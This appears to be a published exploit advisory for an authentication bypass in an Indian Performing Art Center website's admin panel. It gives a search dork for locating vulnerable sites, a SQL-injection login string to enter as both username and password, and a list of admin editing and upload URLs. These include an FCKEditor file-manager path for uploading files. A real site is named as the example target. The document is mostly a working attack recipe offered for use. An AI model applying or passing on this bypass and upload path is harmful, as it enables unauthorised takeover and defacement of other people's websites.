#################################################################################################
# Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepage : ipacglobal.com
# Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
* CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
* CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::''
# Admin Panel Login Path : /admin
# Exploit : Login both for admin username and password as => '=''or'
# Possible Admin Control Panel Useable URL Paths :
/admin/editpages.php
/admin/editpages.php?id=1
/admin/editpages.php?id=2
/admin/editpages.php?id=3
/admin/editpages.php?id=4
/admin/editpages.php?id=5
/admin/editpages.php?id=6
/admin/editpages.php?id=7
/admin/editpages.php?id=8
/admin/editpages.php?id=9
/admin/editpages.php?id=10
/admin/editpages.php?id=11
/admin/editpages.php?id=12
/admin/addcategory.php
/admin/gallery.php?g_id=1
/admin/gallery.php?g_id=13
/admin/gallery.php?g_id=14
/admin/event.php
/admin/event.php?addcat=addcat
/admin/event.php?edit=edit&catid=1
/admin/videos.php
/admin/videos.php?addcat=addcat
/admin/videos.php?edit=edit&catid=1
/admin/fogana.php
/admin/fogana.php?edit=edit&fogana=1
/admin/addtestmoni.php
/admin/testimonials.php?edit=edit&catid=9
Add Image =>
/admin/addimage.php?action=add&g_id=1
Edit Image with Height and Width
/admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350
PATH => /products/flash/....
#################################################################################################
FCKEditor Vulnerability [ You can select File ~ Image ~ Flash ~ Media ]
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php
PATH => /admin/images/image/.....
PATH => /admin/images/file/....
#################################################################################################
# Example Site => ipacglobal.com
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################